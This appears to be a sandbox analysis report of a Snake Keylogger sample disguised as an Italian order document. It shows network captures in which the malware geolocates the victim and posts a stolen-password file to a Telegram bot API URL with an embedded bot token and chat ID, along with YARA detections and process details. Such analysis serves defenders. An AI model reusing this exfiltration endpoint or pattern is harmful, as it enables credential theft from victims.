2025-01-16 12:10:32 UTC	849	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2344221 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ajjKRYUyFHYuHd7o8gWiSkuDjsRRh5BTctYTyvjpDyqnhpvKqZDy2mqsYkZRt6Uqbp0t1LF38JR4rykqG3s2mLermMVUBb9dnz5Xzh5S6R6LngSCWkOpXv4fVJ2qBWaKE1ngEkm5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902e00c13af8c461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1487&min_rtt=1485&rtt_var=561&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1945369&cwnd=232&unsent_bytes=0&cid=1a4f01384e910261&ts=153&x=0"
2025-01-16 12:10:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49883	104.21.48.1	443	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:10:33 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 12:10:33 UTC	863	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2344222 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kPH%2BOR8s5qzoayrK6Sm04GKT70XdGb5W%2Biv7zvdNOxTn%2B3RIOCoj%2F03ecUri6z7bG3fopEw9wVUUv5VQojz5t%2FXrMiPUofa6nZeS4SfCP7db%2F7IUpw%2BIuH56lDkSqDDp6cFWcpgs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902e00c8e8acc461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1473&rtt_var=575&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1867007&cwnd=232&unsent_bytes=0&cid=40f8d7ece316cbba&ts=130&x=0"
2025-01-16 12:10:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49895	104.21.48.1	443	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:10:34 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 12:10:35 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2344224 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dE92bmhKzvJFaL910XMSY1difxRa%2BiPnlJpV2ldgf1SKPpGrBvt7z6H8iPVdu%2BbARGCSWZkPhUGXmmR8rYHYO8ZpHNqZ0ctcCtq%2BLOR6ZqXlRDeTiV0ZqSBCQsLSQ4jdiz9KoOp9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902e00d0aa9942e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1602&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1796923&cwnd=241&unsent_bytes=0&cid=d5ee105c6bd049a9&ts=131&x=0"
2025-01-16 12:10:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49904	104.21.48.1	443	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:10:36 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 12:10:36 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:36 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2344225 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JtcMVoqC6biaEoWorcNw5US3l5LRi8k7A%2BPleYUp%2BPIg9Fdo5ZQvPa2dlytsByJyyJBCREA1ZGxAscv9rJLgS4Pm86q6oOfeH3jmD5G4wn9MO4J924YxZV5YsR1JENypZjsTjtCw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902e00d8ebf9c323-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1481&rtt_var=566&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1917268&cwnd=214&unsent_bytes=0&cid=6fc5169d5e1fac9f&ts=164&x=0"
2025-01-16 12:10:36 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49914	104.21.48.1	443	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:10:37 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-16 12:10:37 UTC	863	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2344226 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UgKZDdX7yF%2F%2FVlAEesjXWUmNaAX4Wkp6jBVzOI9OSRVzGeL%2FjNS%2BkqGekk5eAkogSb6goj1t8DBePPAcvapecJRSPCeNK38VR6JzLyoirTYtHvfc%2BpH9SYnmsVc%2FMPrCskG%2FI9du"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902e00e0ba288c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1807&min_rtt=1801&rtt_var=688&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1577525&cwnd=238&unsent_bytes=0&cid=96f79f8b146c3bcc&ts=151&x=0"
2025-01-16 12:10:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49926	104.21.48.1	443	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:10:38 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-16 12:10:38 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 12:10:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2344227 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BDoznRXAXzJKZJbdJOQvn1zNTS9EYKV7qK3Yf%2BPB%2BheiFcFdNshYwNpvchvb4p5JbhL%2BgFWs7%2Bq2phnoGk%2BvLc1A3D%2BDn3EO66m0aqZSInuzeZ7xMYjTPJhEfotBaZM2kbEHnBNl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902e00e8dfe58c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1778&rtt_var=690&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1560662&cwnd=238&unsent_bytes=0&cid=a0d7a51aa7e4dafa&ts=158&x=0"
2025-01-16 12:10:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49962	149.154.167.220	443	2676	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:10:44 UTC	356	OUT	POST /bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287380231&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd36a1470e4a51 Host: api.telegram.org Content-Length: 572 Connection: Keep-Alive
2025-01-16 12:10:44 UTC	572	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 61 31 34 37 30 65 34 61 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 65 6e 67 69 6e 65 65 72 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 30 31 2f 32 30 32 35 20 2f 20 30 37 3a 31 30 3a 32 37 0d 0a 43 6c 69 65 6e 74 20 49 Data Ascii: --------------------------8dd36a1470e4a51Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:124406Date and Time: 16/01/2025 / 07:10:27Client I
2025-01-16 12:10:45 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 16 Jan 2025 12:10:45 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-16 12:10:45 UTC	520	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 34 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 37 34 39 34 37 38 38 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 61 72 62 74 72 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 72 62 74 72 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 37 33 38 30 32 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 72 61 63 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 69 6c 74 6f 6e 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 69 75 67 79 74 72 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 37 30 32 39 34 34 35 2c 22 64 6f 63 75 6d Data Ascii: {"ok":true,"result":{"message_id":8439,"from":{"id":8174947883,"is_bot":true,"first_name":"arbtr_bot","username":"arbtrs_bot"},"chat":{"id":6287380231,"first_name":"Grace","last_name":"Milton","username":"iugytr","type":"private"},"date":1737029445,"docum

Target ID:	0
Start time:	07:10:00
Start date:	16/01/2025
Path:	C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe"
Imagebase:	0xac0000
File size:	199'168 bytes
MD5 hash:	2D080F1E0BE3EC95D49F138A5E9C4D4F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2417201892.0000000005DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2401541375.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:10:27
Start date:	16/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x1e0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4589297423.000000000284C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4589297423.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4589297423.00000000028B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4589297423.0000000002601000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	25%
Total number of Nodes:	24
Total number of Limit Nodes:	0

Executed Functions

Function 05CB1CE8 Relevance: 1.9, Strings: 1, Instructions: 613
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 05CB1E02

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 56b4cb91f5a120fc4991abd78a50201ca6275447d4707fd73784a8548981f853
Instruction ID: 9dadc2e443204b8275e1d674d327fa3ee9ad66e36f8cffc3fd87d3059d6510a0
Opcode Fuzzy Hash: 56b4cb91f5a120fc4991abd78a50201ca6275447d4707fd73784a8548981f853
Instruction Fuzzy Hash: 3E52D775D102298FDB64DF69C850AD9B7B2FF89300F1086E9D909A7354DB70AE81CF90

Function 05CB51E0 Relevance: 1.7, APIs: 1, Instructions: 211
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05CB5271

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 22799415c7da00db96398fdc3d687f6bbd4d860f8727ac94a4a34118f7bd0615
Instruction ID: 6bc2843103fbeabbdb152f508af9d40f6c758595aeb0a583f6a91b5457b1c46f
Opcode Fuzzy Hash: 22799415c7da00db96398fdc3d687f6bbd4d860f8727ac94a4a34118f7bd0615
Instruction Fuzzy Hash: 3691D0B4E01209DFDB04DFA9D880AEEBBF6FF89310F108429E519A7355D774A941CB91

Function 05CB51E8 Relevance: 1.6, APIs: 1, Instructions: 63
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05CB5271

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: e6cf87090eb7e12b3a8b8d8dd5670ec007e385d1d4b0198dff84dd76848c8a83
Instruction ID: 875b03fbd3d1fe9d38c27a87a409c8c044f0b9608f2fab8721d4e1d8e2baf6be
Opcode Fuzzy Hash: e6cf87090eb7e12b3a8b8d8dd5670ec007e385d1d4b0198dff84dd76848c8a83
Instruction Fuzzy Hash: 7A21CEB1D013499FDB10DFAAD980ADEFBF5BF48310F20842AE519A7250D779A900CBA5

Function 05CB8D39 Relevance: 1.6, APIs: 1, Instructions: 57
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL(?,?), ref: 05CB8DAE

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4e5a5dfb3f1fed35fdd6f3fff6fdb38953ee5fd085da4e57a43cfa72476b3213
Instruction ID: 4819b1f393fe61cb6116d5804808b65bf295a8f2c18e17c0b548418c0a45f3e7
Opcode Fuzzy Hash: 4e5a5dfb3f1fed35fdd6f3fff6fdb38953ee5fd085da4e57a43cfa72476b3213
